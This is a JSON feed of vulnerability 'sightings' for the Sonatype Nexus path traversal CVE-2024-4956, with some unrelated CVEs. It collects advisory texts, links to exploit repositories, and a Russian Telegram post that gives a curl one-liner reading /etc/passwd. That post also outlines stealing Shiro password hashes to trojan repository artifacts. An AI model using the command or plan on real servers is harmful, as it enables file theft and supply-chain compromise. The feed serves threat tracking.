{"vulnerability": "CVE-2024-4956", "sightings": [{"uuid": "e449673d-c0d6-4ac3-a813-b5a341e47caf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49560", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113467913487527714", "content": "", "creation_timestamp": "2024-11-12T03:42:37.971811Z"}, {"uuid": "7bd602bc-248f-43fe-a0d9-a7de2a2bf170", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49569", "type": "seen", "source": "https://infosec.exchange/users/cve/statuses/113809896536556131", "content": "", "creation_timestamp": "2025-01-11T13:13:25.054799Z"}, {"uuid": "570dbdbd-c7c9-4b62-bc1c-1e873a505c7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49569", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfhs44xmgr22", "content": "", "creation_timestamp": "2025-01-11T13:16:17.545365Z"}, {"uuid": "1aa2f77a-c39e-479c-a3ab-9b83c5789fb2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49568", "type": "seen", "source": "https://bsky.app/profile/cve-notifications.bsky.social/post/3lfhs42tzpb2f", "content": "", "creation_timestamp": "2025-01-11T13:16:15.350376Z"}, {"uuid": "4d1c746b-3f09-4e24-86d9-bcf60b55e345", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "seen", "source": "https://bsky.app/profile/cyberguider.bsky.social/post/3leri7cakqc2z", "content": "", "creation_timestamp": "2025-01-02T16:20:33.796772Z"}, {"uuid": "a6f5fe55-a484-41aa-a6ca-e984a8a82b11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49561", "type": "seen", "source": "https://infosec.exchange/users/cR0w/statuses/114179224013214264", "content": "", "creation_timestamp": "2025-03-17T18:38:15.690866Z"}, {"uuid": "69d5500b-b9c2-4dfb-be25-e2d1cc72737f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49561", "type": "seen", "source": "https://bsky.app/profile/cve.skyfleet.blue/post/3lkm5q6ujaw2j", "content": "", "creation_timestamp": "2025-03-17T22:00:59.847380Z"}, {"uuid": "4ec1b337-32d7-45d2-9cbb-32925f8d12d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7532", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 Python exploitation utility\nURL\uff1ahttps://github.com/fin3ss3g0d/CVE-2024-4956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-05T15:42:02.000000Z"}, {"uuid": "9a8db6f1-f865-440f-bdb1-e9bb4e5aeab7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "seen", "source": "https://bsky.app/profile/nimblenerd.social/post/3llhbk7i2im2h", "content": "", "creation_timestamp": "2025-03-28T16:51:07.228439Z"}, {"uuid": "e9d954ad-504f-4971-be32-dd11a82a9005", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "seen", "source": "https://bsky.app/profile/beikokucyber.bsky.social/post/3llk7zvit4m2c", "content": "", "creation_timestamp": "2025-03-29T21:02:06.554286Z"}, {"uuid": "7419a419-452c-44e0-9958-7cdc0f11d536", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2024-49569", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/816dcc8e-f25a-4895-9b59-1bbd9caeccb8", "content": "", "creation_timestamp": "2025-12-03T14:14:49.267740Z"}, {"uuid": "c8a57044-7e49-4c61-a431-1458f077ba5d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-49568", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "b31cfc15-a1bf-42c2-ba5f-a9132d836ba7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2024-49569", "type": "seen", "source": "https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0316/", "content": "", "creation_timestamp": "2026-03-19T00:00:00.000000Z"}, {"uuid": "fc26f0e0-79e2-4637-84e6-b9555551fdf1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7533", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 Python exploitation utility\nURL\uff1ahttps://github.com/un9nplayer/CVE-2024-24919\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-05T16:14:26.000000Z"}, {"uuid": "ad691032-5dd9-4b47-9b96-00ae6015091c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/8679", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aSimple hash cracker for Apache Shiro hashes written in Golang. Useful for exploiting CVE-2024-4956.\nURL\uff1ahttps://github.com/An00bRektn/shirocrack\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-10-04T22:27:21.000000Z"}, {"uuid": "d367087b-485b-4be3-94b8-4a594171b339", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49569", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13401", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-49569\n\ud83d\udd25 CVSS Score: N/A\n\ud83d\udd39 Description: In the Linux kernel, the following vulnerability has been resolved:\n\nnvme-rdma: unquiesce admin_q before destroy it\n\nKernel will hang on destroy admin_q while we create ctrl failed, such\nas following calltrace:\n\nPID: 23644    TASK: ff2d52b40f439fc0  CPU: 2    COMMAND: \"nvme\"\n #0 [ff61d23de260fb78] __schedule at ffffffff8323bc15\n #1 [ff61d23de260fc08] schedule at ffffffff8323c014\n #2 [ff61d23de260fc28] blk_mq_freeze_queue_wait at ffffffff82a3dba1\n #3 [ff61d23de260fc78] blk_freeze_queue at ffffffff82a4113a\n #4 [ff61d23de260fc90] blk_cleanup_queue at ffffffff82a33006\n #5 [ff61d23de260fcb0] nvme_rdma_destroy_admin_queue at ffffffffc12686ce\n #6 [ff61d23de260fcc8] nvme_rdma_setup_ctrl at ffffffffc1268ced\n #7 [ff61d23de260fd28] nvme_rdma_create_ctrl at ffffffffc126919b\n #8 [ff61d23de260fd68] nvmf_dev_write at ffffffffc024f362\n #9 [ff61d23de260fe38] vfs_write at ffffffff827d5f25\n    RIP: 00007fda7891d574  RSP: 00007ffe2ef06958  RFLAGS: 00000202\n    RAX: ffffffffffffffda  RBX: 000055e8122a4d90  RCX: 00007fda7891d574\n    RDX: 000000000000012b  RSI: 000055e8122a4d90  RDI: 0000000000000004\n    RBP: 00007ffe2ef079c0   R8: 000000000000012b   R9: 000055e8122a4d90\n    R10: 0000000000000000  R11: 0000000000000202  R12: 0000000000000004\n    R13: 000055e8122923c0  R14: 000000000000012b  R15: 00007fda78a54500\n    ORIG_RAX: 0000000000000001  CS: 0033  SS: 002b\n\nThis due to we have quiesced admi_q before cancel requests, but forgot\nto unquiesce before destroy it, as a result we fail to drain the\npending requests, and hang on blk_mq_freeze_queue_wait() forever. Here\ntry to reuse nvme_rdma_teardown_admin_queue() to fix this issue and\nsimplify the code.\n\ud83d\udccf Published: 2025-01-11T12:25:19.455Z\n\ud83d\udccf Modified: 2025-04-25T10:06:41.619Z\n\ud83d\udd17 References:\n1. https://git.kernel.org/stable/c/427036030f4d796533dcadba9b845896cb6c10a7\n2. https://git.kernel.org/stable/c/05b436f3cf65c957eff86c5ea5ddfa2604b32c63\n3. https://git.kernel.org/stable/c/5858b687559809f05393af745cbadf06dee61295", "creation_timestamp": "2025-04-25T11:07:44.000000Z"}, {"uuid": "221acd57-3af6-4968-b983-1b42e5b5a9e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/9394", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 Python exploitation utility\nURL\uff1ahttps://github.com/XiaomingX/cve-2024-4956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-12-12T04:06:47.000000Z"}, {"uuid": "a0d4e11e-b43c-4662-bb2a-8555a97dce23", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49568", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/1313", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-49568\n\ud83d\udd39 Description: In the Linux kernel, the following vulnerability has been resolved:\n\nnet/smc: check v2_ext_offset/eid_cnt/ism_gid_cnt when receiving proposal msg\n\nWhen receiving proposal msg in server, the fields v2_ext_offset/\neid_cnt/ism_gid_cnt in proposal msg are from the remote client\nand can not be fully trusted. Especially the field v2_ext_offset,\nonce exceed the max value, there has the chance to access wrong\naddress, and crash may happen.\n\nThis patch checks the fields v2_ext_offset/eid_cnt/ism_gid_cnt\nbefore using them.\n\ud83d\udccf Published: 2025-01-11T12:35:36.190Z\n\ud83d\udccf Modified: 2025-01-11T12:35:36.190Z\n\ud83d\udd17 References:\n1. https://git.kernel.org/stable/c/295a92e3df32e72aff0f4bc25c310e349d07ffbf\n2. https://git.kernel.org/stable/c/42f6beb2d5779429417b5f8115a4e3fa695d2a6c\n3. https://git.kernel.org/stable/c/7863c9f3d24ba49dbead7e03dfbe40deb5888fdf", "creation_timestamp": "2025-01-11T13:06:48.000000Z"}, {"uuid": "19700299-ca73-452e-9160-dd95729bc513", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7395", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 - Nexus &lt; Exploit\nURL\uff1ahttps://github.com/codeb0ss/CVE-2024-4956-PoC\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-23T16:55:48.000000Z"}, {"uuid": "3717a76c-7951-4c37-8c21-2eb353b23882", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7389", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 Nuclei Template\nURL\uff1ahttps://github.com/cungts/CVE-2024-4956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-23T08:17:43.000000Z"}, {"uuid": "547c822b-2dc7-46dc-832a-bd54c026cefb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7460", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aExploit for CVE-2024-4956 affecting all previous Sonatype Nexus Repository 3.x OSS/Pro versions up to and including 3.68.0\nURL\uff1ahttps://github.com/Praison001/CVE-2024-4956-Sonatype-Nexus-Repository-Manager\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-30T08:12:52.000000Z"}, {"uuid": "2f1d3490-dca2-4f5c-9ecd-f2767d907f73", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7442", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 : Nexus Repository Manager 3 poc exploit\nURL\uff1ahttps://github.com/GoatSecurity/CVE-2024-4956\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-06-29T13:27:15.000000Z"}, {"uuid": "5723ba97-9b59-4c52-aa6d-cc85c3374c75", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/7455", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aCVE-2024\n\u63cf\u8ff0\uff1aCVE-2024-4956 : Nexus Repository Manager 3 poc exploit\nURL\uff1ahttps://github.com/41yn14/CVE-2024-0039-Exploit\n\n\u6807\u7b7e\uff1a#CVE-2024", "creation_timestamp": "2024-05-29T22:14:33.000000Z"}, {"uuid": "fa342b7d-c956-4745-b6cb-e338549343ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49561", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/7811", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-49561\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Dell SmartFabric OS10 Software, version(s) 10.5.4.x, 10.5.5.x, 10.5.6.x, 10.6.0.x, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges.\n\ud83d\udccf Published: 2025-03-17T17:35:59.578Z\n\ud83d\udccf Modified: 2025-03-17T17:35:59.578Z\n\ud83d\udd17 References:\n1. https://www.dell.com/support/kbdoc/en-us/000289970/dsa-2025-070-security-update-for-dell-networking-os10-vulnerabilities\n2. https://www.dell.com/support/kbdoc/en-us/000293638/dsa-2025-069-security-update-for-dell-networking-os10-vulnerabilities\n3. https://www.dell.com/support/kbdoc/en-us/000295014/dsa-2025-068-security-update-for-dell-networking-os10-vulnerabilities\n4. https://www.dell.com/support/kbdoc/en-us/000294091/dsa-2025-079-security-update-for-dell-networking-os10-vulnerabilities", "creation_timestamp": "2025-03-17T18:31:36.000000Z"}, {"uuid": "aa527125-d1b5-4da7-b94b-e0847cecedb5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49563", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9258", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-49563\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Dell Unity, version(s) 5.4 and prior, contain(s) an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges and elevation of privileges.\n\ud83d\udccf Published: 2025-03-28T01:35:58.166Z\n\ud83d\udccf Modified: 2025-03-28T01:35:58.166Z\n\ud83d\udd17 References:\n1. https://www.dell.com/support/kbdoc/en-us/000300090/dsa-2025-116-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "creation_timestamp": "2025-03-28T02:28:15.000000Z"}, {"uuid": "dcd26994-3665-4db2-bc67-f98771b0f431", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49565", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9260", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-49565\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Dell Unity, version(s) 5.4 and prior, contain(s) an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Command execution and Elevation of privileges.\n\ud83d\udccf Published: 2025-03-28T01:28:11.627Z\n\ud83d\udccf Modified: 2025-03-28T01:28:11.627Z\n\ud83d\udd17 References:\n1. https://www.dell.com/support/kbdoc/en-us/000300090/dsa-2025-116-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "creation_timestamp": "2025-03-28T02:28:17.000000Z"}, {"uuid": "af9e5915-970e-4372-9602-fdded64c9687", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49564", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/9259", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-49564\n\ud83d\udd25 CVSS Score: 7.8 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Dell Unity, version(s) 5.4 and prior, contain(s) an Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to execution of arbitrary operating system commands with root privileges and elevation of privileges.\n\ud83d\udccf Published: 2025-03-28T01:31:59.287Z\n\ud83d\udccf Modified: 2025-03-28T01:31:59.287Z\n\ud83d\udd17 References:\n1. https://www.dell.com/support/kbdoc/en-us/000300090/dsa-2025-116-security-update-for-dell-unity-dell-unityvsa-and-dell-unity-xt-security-update-for-multiple-vulnerabilities", "creation_timestamp": "2025-03-28T02:28:16.000000Z"}, {"uuid": "66e91c6f-713c-4744-8159-447f359260a2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-49561", "type": "seen", "source": "https://t.me/cvedetector/20514", "content": "{\n  \"Source\": \"CVE FEED\",\n  \"Title\": \"CVE-2024-49561 - Dell SmartFabric OS10 Incorrect Privilege Assignment Elevation of Privileges\", \n  \"Content\": \"CVE ID : CVE-2024-49561 \nPublished : March 17, 2025, 6:15 p.m. | 1\u00a0hour, 49\u00a0minutes ago \nDescription : Dell SmartFabric OS10 Software, version(s) 10.5.4.x, 10.5.5.x, 10.5.6.x, 10.6.0.x, contain(s) an Incorrect Privilege Assignment vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Elevation of privileges. \nSeverity: 7.8 | HIGH \nVisit the link for more details, such as CVSS details, affected products, timeline, and more...\",\n  \"Detection Date\": \"17 Mar 2025\",\n  \"Type\": \"Vulnerability\"\n}\n\ud83d\udd39 t.me/cvedetector \ud83d\udd39", "creation_timestamp": "2025-03-17T21:39:43.000000Z"}, {"uuid": "1b9ebdcd-7d12-49e1-8e16-c81e1459a5d3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "Telegram/biY2bjchNPIPtBraoWF4HOnZ3MCv21oYLrAQJyWnavm_-Yo", "content": "", "creation_timestamp": "2025-08-24T21:00:04.000000Z"}, {"uuid": "2fd38bb9-99af-4bbc-8a70-281800f32f24", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/true_sec/77", "content": "CVE-2024-4956 - Unauthenticated Path Traversal in Nexus Repository Manager 3\n\u0420\u0430\u0431\u043e\u0442\u0430\u0435\u0442\u2026\u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043e\u2026\n\nhttps://github.com/gmh5225/CVE-2024-4956", "creation_timestamp": "2024-05-26T11:48:10.000000Z"}, {"uuid": "69004dc3-054f-406a-87e9-1d5c8399c9f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4956", "type": "published-proof-of-concept", "source": "https://t.me/purple_medved/257", "content": "\u0412 \u043a\u043e\u043d\u0446\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u043c\u0435\u0441\u044f\u0446\u0430 \u0431\u044b\u043b\u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u044b \u0434\u0435\u0442\u0430\u043b\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 CVE-2024-4956 (\u043e\u0446\u0435\u043d\u043a\u0430 \u043f\u043e CVSS=7.5) \u043a\u043b\u0430\u0441\u0441\u0438\u0447\u0435\u0441\u043a\u0438\u0439 path traversal \u0432 Sonatype Nexus Repository 3.x \n\n\u0414\u0430\u043d\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u043d\u0435\u0434\u043e\u043e\u0446\u0435\u043d\u0451\u043d\u043d\u0443\u044e \u043e\u0446\u0435\u043d\u043a\u0443 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u043e\u0441\u0442\u0438 \u0438\u043c\u0435\u0435\u0442 \u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f supply chain \u0430\u0442\u0430\u043a, \u0431\u043b\u0430\u0433\u043e\u0434\u0430\u0440\u044f \u0448\u0438\u0440\u043e\u043a\u043e\u043c\u0443 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044e open-source \u0432\u0435\u0440\u0441\u0438\u0438 \u0434\u0430\u043d\u043d\u043e\u0433\u043e \u041f\u041e \u0432 \u0440\u0430\u0437\u043d\u044b\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u0445 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443.\nSonatype Nexus Repository \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u0435\u0442 \u0441\u043e\u0431\u043e\u0439 \u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0435\u0432 \u0434\u043b\u044f \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u043e\u0432. \u041f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0444\u043e\u0440\u043c\u0430\u0442\u044b \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u043e\u0432: Java (Maven), \u043e\u0431\u0440\u0430\u0437\u044b Docker, Python, Ruby, NPM, Bower, RPM-\u043f\u0430\u043a\u0435\u0442\u044b, gitlfs, apt, Go, Nuget \u0438 \u043f\u0440.\n\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043e\u0447\u0435\u043d\u044c \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0447\u0442\u0435\u043d\u0438\u044e \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 \u041f\u041e:\ncurl https://nexus_target/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n\n\u041d\u043e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0438\u043c, \u0447\u0442\u043e \u043c\u044b \u043d\u0435 \u043f\u0440\u043e\u0441\u0442\u043e \u0445\u043e\u0442\u0438\u043c \u0447\u0438\u0442\u0430\u0442\u044c \u0444\u0430\u0439\u043b\u0438\u043a\u0438, \u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0434\u043e\u0441\u0442\u0443\u043f \u0438 \u043f\u0440\u043e\u0442\u0440\u043e\u044f\u043d\u0438\u0442\u044c \u0430\u0440\u0442\u0435\u0444\u0430\u043a\u0442\u044b \u0434\u043b\u044f \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0445 \u0430\u0442\u0430\u043a \ud83d\ude0e\nNexus \u0434\u043b\u044f \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 Apache Shiro 1 \u0445\u0435\u0448\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0447\u0438\u0442\u0430\u0442\u044c \u0438\u0437 OrientDB .pcl \u0444\u0430\u0439\u043b\u043e\u0432 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0431\u044b\u043b\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 \u0432 \u0442\u043e\u043c, \u0447\u0442\u043e 